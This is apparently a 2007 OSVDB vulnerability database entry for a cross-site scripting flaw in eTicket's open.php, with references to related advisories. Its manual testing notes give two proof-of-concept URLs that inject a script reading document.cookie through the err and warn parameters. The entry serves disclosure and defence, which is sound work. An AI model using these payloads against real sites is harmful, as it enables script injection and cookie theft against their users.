eTicket open.php Multiple Variable XSS

2007-06-27T00:00:00
ID OSVDB:34786
Type osvdb
Reporter OSVDB
Modified 2007-06-27T00:00:00

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[PRODUCT FOLDER]/open.php?err=<script>alert(document.cookie)</script> http://[target]/[PRODUCT FOLDER]/open.php?warn=<script>alert(document.cookie)</script>

References:

Vendor URL: http://eticket.sourceforge.net/ Secunia Advisory ID:25871 Other Advisory URL: http://www.netvigilance.com/advisory0031 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-06/0580.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0372.html Keyword: netVigilance Security Advisory #31 ISS X-Force ID: 35121 FrSIRT Advisory: ADV-2007-2372 CVE-2007-2801 Bugtraq ID: 24681